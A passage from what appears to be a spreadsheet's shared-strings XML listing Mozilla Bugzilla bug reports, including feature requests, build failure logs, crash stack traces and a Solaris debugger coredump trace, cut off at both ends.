    <t>[XUL Syntax] Add XUL display types to CSS</t>
  </si>
  <si>
    <t>The basic XUL display types should be in CSS.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-312008</t>
  </si>
  <si>
    <t>RSS feeds stop loading after connection errors</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
I was using Thunderbird 1.5b1 for some time and it was working fine. But it
suddenly stopped loading new feeds. Even when i force 'Get Messages' its not
loading.
Then i moved to thunderbird 1.5b2  its again giving the same problem. 
Then I deleted my News &amp; Blogs account and created a new one. In the new
account  in Manage subscriptions window when i added new feed the status
bar said verifying feeds and then the window hanged.
( My network connections are fine and i am able to see the feeds in firefox. )
I hate to to file this bug since i don't how to reproduce this. 
But i don't want to keep quite. I am a software developer and If someone
points me some resources to debug this issue I will be very happy to 
do that. I like to contribute to mozilla.org.
Reproducible: Always</t>
  </si>
  <si>
    <t>palam_rect</t>
  </si>
  <si>
    <t>NSS-333657</t>
  </si>
  <si>
    <t>certutil cannot generate RSA keys larger than 2048 bits</t>
  </si>
  <si>
    <t>This is an RFE from an internal customer. Currently certutil will only generate RSA keys between 512 and 2048 bits. I'm proposing to extend it to 8192 the maximum that softoken supports.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-374042</t>
  </si>
  <si>
    <t>cvs lock - MacOSX Sunbird mozilla1.8-l10n tinderbox has issues</t>
  </si>
  <si>
    <t>MacOSX Sunbird mozilla1.8-l10n tinderbox has issues
It seems that about a week ago the MacOSX Sunbird mozilla1.8-l10n tinderbox was changed to MacOSX Darwin 8.8.1 cg-xserve03 Clbr Sb-Moz1.8-l10n tinderbox. Since that time all MacOSX l10n tinderboxen fail and report the following error:
error: file '../../../l10n//netwerk/necko.properties' doesn't exist
But the file exist because the Windows and Linux build succeeds.
It seems that the tinderbox itself has issues with checking out the locales from CVS:
From logfile:
=============
checkout start: Thu Mar 15 03:04:01 PDT 2007
cvs checkout: failed to create lock directory for `/l10n/l10n/ca/calendar' (/l10n/l10n/ca/calendar/#cvs.lock): Permission denied
cvs checkout: failed to obtain dir lock in repository `/l10n/l10n/ca/calendar'
cvs [checkout aborted]: read lock failed - giving up
checkout finish: Thu Mar 15 03:05:28 PDT 2007
[...]
/builds/tinderbox/Sunbird-Mozilla1.8-l10n/Darwin_8.8.1_Clobber/mozilla//dist/Calendar.app/Contents/MacOS/sunbird-bin does not exist.
[...]
Building following locales: ca cs da de es-ES eu fr ga-IE hu it ja lt mn nb-NO nl pl pt-BR ru sk sl sv-SE tr zh-CN
ca...No files to copy
busted.
cs...No files to copy
busted.
da...No files to copy
busted.
de...No files to copy
busted.
...
scp -oProtocol=2 -r /builds/tinderbox/Sunbird-Mozilla1.8-l10n/Darwin_8.8.1_Clobber/cg-xserve03-mozilla1.8-l10n/packages/* calbld@stage.mozilla.org:/home/ftp/pub/calendar/sunbird/tinderbox/latest-mozilla1.8-l10n/
/builds/tinderbox/Sunbird-Mozilla1.8-l10n/Darwin_8.8.1_Clobber/cg-xserve03-mozilla1.8-l10n/packages/*: No such file or directory
command failed!</t>
  </si>
  <si>
    <t>SOCORRO-411417</t>
  </si>
  <si>
    <t>can't search for crash reports whose url contains a substring</t>
  </si>
  <si>
    <t>It would be nice if we could search by part of a URL as well as the entire thing.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-329989</t>
  </si>
  <si>
    <t>Remove hard tab chars from S/Mime code in mailnews/mime/src/</t>
  </si>
  <si>
    <t>I propose we replace all hard tab chars in files
  mimecms.h
  mimecms.cpp
  mimemcms.h
  mimemcms.cpp
with 2 spaces.
This matches the spacing in the rest of the file.
This change will ease reviewing of a larger patch I'm working on.
I would like to land this white space change first so reviewing the other patch will be much simpler.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-276467</t>
  </si>
  <si>
    <t>A Troubles? visit homepage or contact author disclaimer should be well visible on extensions detail page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Messages about problems and bugs are currently sent on UMO IRC filed as
bugzilla bugs on Update component (example: bug 276457) or thrown as negative
comments on the extension's feedback page. Many of them are clarificaion
requests which could be answered visiting extension homepage and browsing
documentation or FAQ. Other may be bug reports which would be more properly
handled by author if contacted. 
Current moreinfo.php layout puts extension homepage URL at the very bottom of
the page after all the feedback info. This URL should be displayed in more
visible places with useful context: for instance just after extension
description with a label like More details on extension homepage
http://www.xyz.kj.
A statement explaining that addons.mozilla.org has no responsibility on
extension problems nor power in fixing them but extension author should be
contacted instead needs to be placed just after the Install link. Something
like: DISCLAIMER: $extensionName has been tested for
installation/uninstallation and basic functionality but mozilla.org has no
responsibility for bugs you may find in this extension and and no power to fix
them. If you have specific questions or you're facing a problem with
$extensionName please visit the homepage http://www.xyz.kj and/or contact
$authorName directly..
Every suggestion about the text is welcome since my English is not great.
Reproducible: Always
Steps to Reproduce:
1. open URL
https://addons.update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;version=1.0&amp;os=Windows&amp;id=220
2. Ask yourself: what should I do if this extension doesn't work but I need its
functionalities
3. Answer
Actual Results:  
I was tempted to file a bug on bugzilla about FlashGot not working or at least
to express an opinion like Why does this extension suck so much? - 0 stars 
Expected Results:  
The webpage should suggest me to go http://www.flashgot.net. There I would read
extension's FAQ quickly findinding a solution to my problem by myself.</t>
  </si>
  <si>
    <t>CORE-487245</t>
  </si>
  <si>
    <t>Cleanup and better organize code in widget/src/windows/nsWindow</t>
  </si>
  <si>
    <t>General goal: clean up and simplify code for debugging and improve commenting
- split off static functions into utility library
- split off platform specific code into separate files
- split off debug code into separate file
- split off closely related chunks of code into separate files</t>
  </si>
  <si>
    <t>TESTING-359999</t>
  </si>
  <si>
    <t>add a --enable-mochitest flag to .mozconfig</t>
  </si>
  <si>
    <t>Need this to start integrating better with the build</t>
  </si>
  <si>
    <t>FIREFOX-270479</t>
  </si>
  <si>
    <t>wrong url in address bar when switching between tabs which contain encrypted content</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
If you load a public http address in first tab and then https address in a
second tab and you switch between tabs using keyboard shortcuts (ctrl+pgUp or
pgDown) wrong URL is shown in the address bar. Seems fine if you use the mouse.
Reproducible: Always
Steps to Reproduce:
1.Open Firfox
2.Load http address in the first tab
3.Load hhtps address in the second tab
4.Switch between tabs using keyboard
Actual Results:  
https address is shown when switching to first (http) tab
Expected Results:  
It should show the address from which the active tab was loaded from</t>
  </si>
  <si>
    <t>byja</t>
  </si>
  <si>
    <t>SEAMONKEY-379865</t>
  </si>
  <si>
    <t>Re-write help_help.xhtml to fit with toolkit's Help viewer</t>
  </si>
  <si>
    <t>If bug 379864 hasn't been resolved when we switch to MOZ_XUL_APP we need to re-write the Using the Help Window doc so it fits with the new Help viewer.</t>
  </si>
  <si>
    <t>CALENDAR-167153</t>
  </si>
  <si>
    <t>[RFE] Ability to drop URL's on the calendar list</t>
  </si>
  <si>
    <t>patch follows</t>
  </si>
  <si>
    <t>CALENDAR-405650</t>
  </si>
  <si>
    <t>Integer overflow during creating custom reminders</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.1.10pre) Gecko/2007112703 Calendar/0.8pre
The Custom Reminder dialog allows entering arbitrary values for the minutes/hours/days. Entering values greater than 32767 results in an integer overflow in the resulting trigger duration. Example:
Entered values for X minutes before the event starts:
 |      Entry in exported .ics file:
 |       |                     Displayed entry in dialog upon editing:
 |       |                      |
 24671   DURATION:-P17DT3H11M   ok (24671 minutes before the event starts)
 32767   DURATION:-P22DT18H7M   ok (32767 minutes before the event starts)
 32768   DURATION:P22DT18H8M    not ok (32768 minutes after the event starts)
 43210   DURATION:P15DT12H6M    not ok (22326 minutes after the event starts)
 65535   DURATION:PT1M          not ok (1 minute after the event starts)
 65536   DURATION:PT0S          not ok (0 day after the event starts)
Expected Results:
Either the integer overflow must be handled to allow such arbitrary values or the input should be limited to a valid range. The latter solution is already used in the Custom Recurrence dialog.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-135226</t>
  </si>
  <si>
    <t>256 color palettes should be selected as background palettes not as foreground palettes</t>
  </si>
  <si>
    <t>taken from http://bugscape.mcom.com/show_bug.cgi?id=12932
Gecko currently creates a custom palette and selects it as the foreground
palette. This causes two problems:
1. If an embedding application has a foreground palette it will get into a race
condition with Gecko where they are both trying to select the foreground
palette resulting if flickering and hanging the application.
2. When a separate application with a foreground palette is activated the colors
in the Gecko browser window will be messed up because its palette has been
swapped out.</t>
  </si>
  <si>
    <t>CORE-337424</t>
  </si>
  <si>
    <t>Unloaded part of image drawn as black when top of image is above visible region</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060509 Firefox/3.0a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060509 Firefox/3.0a1
Fix from bug 326672 and bug 336236 draws only decoded parts of image but it doesn't take into account that image in some cases will not be draw from (00) position. This can be spoted when image bigger then visible region is loaded and page is scrolled down.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-402912</t>
  </si>
  <si>
    <t>###!!! ASSERTION: bad pref min max size with XUL equalsize flex</t>
  </si>
  <si>
    <t>Created attachment 287727
testcase
Loading the testcase triggers:
###!!! ASSERTION: bad pref min max size: '(boxSizes-&gt;min pref &amp;&amp; boxSizes-&gt;pref max)' file /Users/jruderman/trunk/mozilla/layout/xul/base/src/nsSprocketLayout.cpp line 1184</t>
  </si>
  <si>
    <t>TOOLKIT-396309</t>
  </si>
  <si>
    <t>Problem Loading Page title for malware protection is incorrect</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007091513 Minefield/3.0a8pre ID:2007091513
repro:
Open FF
Open URL
result:
the fishing protection page pops up with the title
Problem Loading Page
expected:
something like e.g. Blocked Page  because that reflects what has happened</t>
  </si>
  <si>
    <t>CORE-506254</t>
  </si>
  <si>
    <t>plugin_client_message_filter never used Display *dpy</t>
  </si>
  <si>
    <t>http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/widget/src/gtk2/nsWindow.cpp&amp;rev=1.65
is the original code
3213 Display *dpy 
3214 dpy = GDK_WINDOW_XDISPLAY((GdkWindow*)(gPluginFocusWindow-&gt;
3215 GetNativeData(NS_NATIVE_WINDOW)))
3216 if (gdk_x11_get_xatom_by_name(WM_PROTOCOLS)
3217 != xevent-&gt;xclient.message_type) { 3218 return return_val
3219 }
3220
3221 if ((Atom) xevent-&gt;xclient.data.l[0] ==
3222 gdk_x11_get_xatom_by_name(WM_TAKE_FOCUS)) {
3223 // block it from gtk2.0 focus proxy 3224 return_val = GDK_FILTER_REMOVE
3225 }
3226
3227 return return_val
3228 }</t>
  </si>
  <si>
    <t>MOZILLA.ORG-323983</t>
  </si>
  <si>
    <t>create latest directory for experimental cairo builds</t>
  </si>
  <si>
    <t>it would be really nice to have a latest directory in that always points to the latest build of cairo:
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/experimental/cairo/</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-393617</t>
  </si>
  <si>
    <t>update text on firefox.com/backtoschool to be clickable</t>
  </si>
  <si>
    <t>The underlined download it today! text on landing page for the new Firefox Campus Edition should be clickable as another way to initiate download.
Thanks
John</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-183186</t>
  </si>
  <si>
    <t>Release Notes (1.0 ~ 1.4rc3) - add PluginDoc to the Plugins section</t>
  </si>
  <si>
    <t>Since PluginDoc is becoming quite an extensive source of information about
installation of browser plugins and lists issues (with bugzilla links) if and
as appropriate I think it might be useful to add it to the Plugins section of
the release notes for future releases.
Of course you can take this as an invitation to say bite me :)
Just filing it before the 1.3a freeze.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-57115</t>
  </si>
  <si>
    <t>mime.properties file should contain correct HTML</t>
  </si>
  <si>
    <t>The mime.properties contains incorrect html weird chars etc..</t>
  </si>
  <si>
    <t>SEAMONKEY-225207</t>
  </si>
  <si>
    <t>Scroll position changes when switching tab and having a focused element</t>
  </si>
  <si>
    <t>This looks like a regression from bug 120148.
When a (form) element is focussed in a tab but scrolled out of view and you
switch to another tab and back the focussed element is scrolled back into view.
steps to reproduce: 
1 open a random bugzilla bug page like bug 120148
2 focus one of the textfields
3 scroll down to get the textfield out of view
4 remember how far you scrolled down
5 switch to another tab (or create a new one)
6 switch back
7 check where your scroll position is
I would not expect tab switching to affect my scroll position.
Tested on linux 2003110705 but have seen it before.</t>
  </si>
  <si>
    <t>tabbed-browser</t>
  </si>
  <si>
    <t>CORE-464788</t>
  </si>
  <si>
    <t>Fix compile warnings in XPConnect</t>
  </si>
  <si>
    <t>Currently compiling XPConnect gives:
/Users/mrbkap/work/main/mozilla/js/src/xpconnect/src/xpcruntimesvc.cpp:89: warning: unused variable â€˜rvâ€™
/Users/mrbkap/work/main/mozilla/js/src/xpconnect/src/xpcwrappednativeinfo.cpp:230: warning: left-hand operand of comma has no effect
/Users/mrbkap/work/main/mozilla/js/src/xpconnect/src/xpcwrappednativeinfo.cpp:231: warning: left-hand operand of comma has no effect
The first warning is trivial. The second warnings are due to the lines:
    STOBJ_SET_PARENT(funobj nsnull)
    STOBJ_SET_PROTO(funobj nsnull)
which expand to:
    (void)((!(0) || (((JSObject*)0)-&gt;classword |= 1)) (funobj)-&gt;fslots[1] = ((j
sval)(0)))
    (void)((!(0) || (((JSObject*)0)-&gt;classword |= 1)) (funobj)-&gt;fslots[0] = ((j
sval)(0)))
leading to the warning. The fix is to use OBJ_CLEAR_{PARENTPROTO}.</t>
  </si>
  <si>
    <t>FIREFOX-233481</t>
  </si>
  <si>
    <t>change nsAutoCompleteMdbResult to use nsCOMArray instead of nsVoidArray</t>
  </si>
  <si>
    <t>This bug is inspired by bug 221484 and bug 233479.
I noticed that the internal usage of MdbResult is a void array so references 
to nsIMdbRow objects are not held.  This seems dangerous what if a row were to 
be deleted while the MdbResult was still in use?
Coming up is a patch to change this from nsVoidArray to nsCOMArray.  
This removes all the static casts.
Is there a reason why we are not refcounting these objects?</t>
  </si>
  <si>
    <t>FIREFOX-325171</t>
  </si>
  <si>
    <t>Initial startup time is teh sux0rs.</t>
  </si>
  <si>
    <t>The first time you start a places build there's this seems-like 30 second lockup. We need to figure this out before we can turn places on.</t>
  </si>
  <si>
    <t>NSS-354008</t>
  </si>
  <si>
    <t>klocwork bugs in freebl</t>
  </si>
  <si>
    <t>ID:       91218
Function: mp_div
Location: nss/lib/freebl/mpi/mpi.c : 1006
Dereference of pointer 'a' at line 1006 before NULL check at line 1009
1006	  mp_sign  signA = MP_SIGN(a) 
1007	  mp_sign  signB = MP_SIGN(b) 
1008	 
1009	  ARGCHK(a != NULL  
----
ID 91219
Same issue as above but for pointer variable b at line 1007 1009</t>
  </si>
  <si>
    <t>THUNDERBIRD-498331</t>
  </si>
  <si>
    <t>Empty of Local Trash doesn't appear to stay empty in the same session</t>
  </si>
  <si>
    <t>STR:
1) Have some messages in your local folders trash folder.
2) Select the trash folder.
3) Right click select Empty Trash.
4) Select a different folder.
5) Select the trash folder again.
Expected results: Empty Trash folder
Actual results: messages are still listed
Selecting a message does nothing.
There are messages listed in the folder until I restart (unless I select one just after step 5 then that is still listed after the restart).
Pretty sure this is a regression from bug 497199.</t>
  </si>
  <si>
    <t>CORE-311950</t>
  </si>
  <si>
    <t>crash at http://www.hansrossel.com/reisgids/turkijePR.html [@ js_LookupPropertyWithFlags ]</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20051008
Firefox/1.4.1 ID:2005100805 / vanilla profile
Open url and crash
this is NO dupe of Bug 276979
works in 20051004 1222pdt build
fails in 20051004 1350pdt build
regressionwindow : (bonsai down will try later)
TB10464972Y
Incident ID: 10464972
Stack Signature	js_LookupPropertyWithFlags e0c06551
Product ID	Firefox15
Build ID	2005100805
Trigger Time	2005-10-10 04:42:13.0
Platform	Win32
Operating System	Windows NT 5.0 build 2195
Module	js3250.dll + (0002d4be)
URL visited	http://www.hansrossel.com/reisgids/turkijePR.html
User Comments	crash while opening this page
Since Last Crash	4391 sec
Total Uptime	4391 sec
Trigger Reason	Access violation
Source File Line No.
c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsobj.c line 2592
Stack Trace 	
js_LookupPropertyWithFlags 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsobj.c line
2592]
js_LookupProperty 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsobj.c line
2519]
js_GetProperty 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/jsobj.c line
2804]
nsXPCWrappedJSClass::CallQueryInterfaceOnJSObject 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp
line 243]
nsXPCWrappedJSClass::DelegatedQueryInterface 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappedjsclass.cpp
line 589]
nsXPCWrappedJS::QueryInterface 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappedjs.cpp
line 97]
nsEventListenerManager::HandleEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/events/src/nsEventListenerManager.cpp
line 1779]
nsXULDocument::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/document/src/nsXULDocument.cpp
line 1242]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2135]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2132]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2132]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2132]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2132]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2132]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2132]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/xul/content/src/nsXULElement.cpp
line 2132]
nsEventStateManager::DispatchMouseEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/events/src/nsEventStateManager.cpp
line 2627]
nsEventStateManager::NotifyMouseOut 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/events/src/nsEventStateManager.cpp
line 2696]
nsEventStateManager::NotifyMouseOver 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/events/src/nsEventStateManager.cpp
line 2746]
nsEventStateManager::GenerateMouseEnterExit 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/events/src/nsEventStateManager.cpp
line 2785]
nsEventStateManager::PreHandleEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/content/events/src/nsEventStateManager.cpp
line 522]
PresShell::HandleEventInternal 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/layout/base/nsPresShell.cpp
line 6361]
PresShell::HandleEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/layout/base/nsPresShell.cpp
line 6203]
nsViewManager::HandleEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/view/src/nsViewManager.cpp
line 2559]
nsViewManager::DispatchEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/view/src/nsViewManager.cpp
line 2246]
HandleEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/view/src/nsView.cpp
line 174]
nsWindow::DispatchEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp
line 1252]
nsWindow::DispatchMouseEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp
line 5991]
ChildWindow::DispatchMouseEvent 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp
line 6242]
nsWindow::WindowProc 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/widget/src/windows/nsWindow.cpp
line 1434]
USER32.dll + 0x3158f (0x77e4158f)
USER32.dll + 0x31dc9 (0x77e41dc9)
USER32.dll + 0x31e7e (0x77e41e7e)
nsAppStartup::Run 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/toolkit/components/startup/src/nsAppStartup.cpp
line 151]
main 
[c:/builds/tinderbox/Fx-Mozilla1.8/WINNT_5.2_Depend/mozilla/browser/app/nsBrowserApp.cpp
line 61]
KERNEL32.dll + 0x28989 (0x79628989)</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-508030</t>
  </si>
  <si>
    <t>nsIMIMEService.getTypeFromExtension fails to find a match in the ext-to-type-mapping category if the provided extension is not lowercase</t>
  </si>
  <si>
    <t>The ext-to-type-mapping category introduced in bug 231886 is meant to
contain a set of lowercase file extensions that are checked as a last resort
when trying to determine the MIME type of a file based on its extension:
https://developer.mozilla.org/en/How_Mozilla_determines_MIME_Types#ExternalHelperAppService
At present however the check in nsIMIMEService.getTypeFromExtension is
case-sensitive and fails to find a match in the ext-to-type-mapping
category if the extension provided in the argument is not lowercase.
In practice this means that any Mozilla extension that relies on the
ext-to-type-mapping would fail to open local files if their file extension
is not lowercase. For example Mozilla Archive Format can currently open
Example.mht but not Example.MHT unless the MIME type is already
registered in the operating system.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-660926</t>
  </si>
  <si>
    <t>get rid of /builds/moz2_slave</t>
  </si>
  <si>
    <t>We can do this by either moving the buildslave to /builds/slave or retiring all the old slaves that have this.
Because we're using both /builds/slave and /builds/moz2_slave we had to add a second bind mount and now all linux slaves are going to have both /builds/slave and /builds/moz2_slave directories (one empty).</t>
  </si>
  <si>
    <t>SEAMONKEY-389838</t>
  </si>
  <si>
    <t>Add contentprefs files to SeaMonkey packages file</t>
  </si>
  <si>
    <t>We need to add some files from the site-specific preference services to the SeaMonkey packages file see Bug 385085 for Firefox version of this.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-520149</t>
  </si>
  <si>
    <t>JavaScript error org.mozilla.internetHealthCheck is not a function on Mozilla.org pages</t>
  </si>
  <si>
    <t>David told me that internetHealthCheck() is only used on the Causes page. However it appears that code calling it is in one of the global template files causing this error on every other page. Also I can't even find its usage on the Causes page as the error appears there too.
Here are the full details from Firebug:
org.mozilla.internetHealthCheck is not a function
anonymous()mozilla.org.js (line 38)
anonymous()mozilla.org.js (line 60)
anonymous()jquery-1....2.min.js (line 19)
anonymous([function() function()] function() Object name=F)jquery-1....2.min.js (line 12)
anonymous()jquery-1....2.min.js (line 19)
anonymous()jquery-1....2.min.js (line 19)
[Break on this error] org.mozilla.internetHealthCheck()\nmozilla.org.js (line 38)</t>
  </si>
  <si>
    <t>gphemsley</t>
  </si>
  <si>
    <t>CORE-140698</t>
  </si>
  <si>
    <t>mozilla(gtk2) coredump on Solaris</t>
  </si>
  <si>
    <t>John Bruce Bolian and I build mozilla using gtk2.0.0 on Solaris building
process runs smoothly. after we start up mozilla coredump happens.
Compling Enviroment:
  Solaris8 and Solari9
  gtk2.0.0(including its dependent libraries shiping with Gnome Beta3) 
  CC (Ship with Forte6 update 2)
Both Bolian and I tried to use DBX to debug it. it is the debug info output by
DBX: (DBX is debugger of Forte)
***********below is output of DBX*************************************
Reading mozilla-bin
Reading ld.so.1
Reading libgkgfx.so
Reading libjsj.so
Reading libmozjs.so
Reading libxpcom.so
Reading libplds4.so
Reading libplc4.so
Reading libnspr4.so
Reading libpthread.so.1
Reading libdl.so.1
Reading librt.so.1
Reading libsocket.so.1
Reading libm.so.1
Reading libCrun.so.1
Reading libw.so.1
Reading libthread.so.1
Reading libc.so.1
Reading libnsl.so.1
Reading libaio.so.1
Reading libmd5.so.1
Reading libmp.so.2
Reading libc_psr.so.1
detected a multithreaded program
(/opt/SUNWspro/bin/../WS6U2/bin/sparcv9/dbx) run
Running: mozilla-bin 
(process id 5278)
Reading libdemangle.so.1
File descriptors set to 512
Type Manifest File:
/export/admin/build/mozilla1.0-CC/mozilla/dist/bin/components/xpti.dat
nsNativeComponentLoader: autoregistering begins.
nsNativeComponentLoader: autoregistering succeeded
Reading libjsloader.so
nNCL: registering deferred (0)
Reading libembedcomponents.so
Reading libcaps.so
Reading libmozz.so
Reading libxpconnect.so
Reading libpref.so
Reading libnecko.so
Reading libnsappshell.so
Reading libwidget_gtk2.so
Reading libX11.so.4
Reading libgtk-x11-2.0.so.0.0.1
Reading libgdk-x11-2.0.so.0.0.1
Reading libatk-1.0.so.0.0.1
Reading libgdk_pixbuf-2.0.so.0.0.1
Reading libpangox-1.0.so.0.0.1
Reading libpango-1.0.so.0.0.1
Reading libgobject-2.0.so.0.0.1
Reading libgmodule-2.0.so.0.0.1
Reading libglib-2.0.so.0.0.1
Reading libXext.so.0
Reading libintl.so.1.0.1
Reading librdf.so
Reading libprofile.so
Reading libuconv.so
Reading libunicharutil.so
warning: property cp1256 already exists
Reading libucvlatin.so
Reading libchrome.so
Reading libhtmlpars.so
Reading liburiloader.so
Reading libgfx_gtk.so
Reading libXp.so.1
GFX: dpi=90 t2p=0.0625 p2t=16 depth=24
Reading UTF-8%8859-1.so
Reading libdocshell.so
WEBSHELL+ = 1
Reading libjsdom.so
Reading libgkcontent.so
Reading libnslocale.so
Reading liboji.so
Reading libgkplugin.so
Reading libmozbrwsr.so
Reading libappcomps.so
Reading libstrres.so
Reading libimglib2.so
Reading libjar50.so
warning: property switchskins already exists
warning: property switchskinstitle already exists
Reading libcookie.so
WEBSHELL+ = 2
Reading libchardet.so
Reading libgklayout.so
t@1 (l@1) signal SEGV (no mapping at the fault address) in
gtk_tooltips_force_window dbx: warning: can't find file
/gnome/2.0/community/src-2.0_06/gtk-multihead/gtk/gtktooltips.lo
dbx: warning: see `help finding-files'
at 0xfe2c0f60
0xfe2c0f60: gtk_tooltips_force_window+0x00f0:   ld      [%l0 + 0x4] %l0
Current function is nsLookAndFeel::InitColors (optimized)
  424     gtk_tooltips_force_window(tooltips)
(/opt/SUNWspro/bin/../WS6U2/bin/sparcv9/dbx) 
********************above is output of DBX*******************************
it is the function stack :
*************below is function stack when segment fault happens*************
  424     gtk_tooltips_force_window(tooltips)
(/opt/SUNWspro/bin/../WS6U2/bin/sparcv9/dbx) where
current thread: t@1
  [1] gtk_tooltips_force_window(0x1f99c8 0xb9340 0x1 0x0 0x0 0x0) at
0xfe2c0f60
=&gt;[2] nsLookAndFeel::InitColors() (optimized) at 0xfe640308 (line ~424) in
nsLookAndFeel.cpp
  [3] nsLookAndFeel::nsLookAndFeel(this = ???) (optimized) at 0xfe63f2f8 (line
~69) in nsLookAndFeel.cpp
  [4] nsLookAndFeelConstructor(aOuter = ??? aIID = STRUCT aResult = ???)
(optimized) at 0xfe63d3e0 (line ~50) in nsWidgetFactory.cpp
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/xpcom/build/nsGenericFactory.o
  [5] nsGenericFactory::CreateInstance(0x1f8038 0x0 0xfc5bf228 0xffbfe6a8
0x2c48 0xff1d1078) at 0xff152920
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/xpcom/build/nsComponentManager.o
  [6] nsComponentManagerImpl::CreateInstance(0x400c8 0xfc5d4968 0x0
0xfc5bf228 0xffbfe6a8 0x10a4) at 0xff0db064
  [7] nsComponentManagerImpl::GetService(0x400c8 0xfc5d4968 0xfc5bf228
0xffbfe7b4 0xda97c 0xa22176e1) at 0xff0db5d4
dbx: warning: can't find file
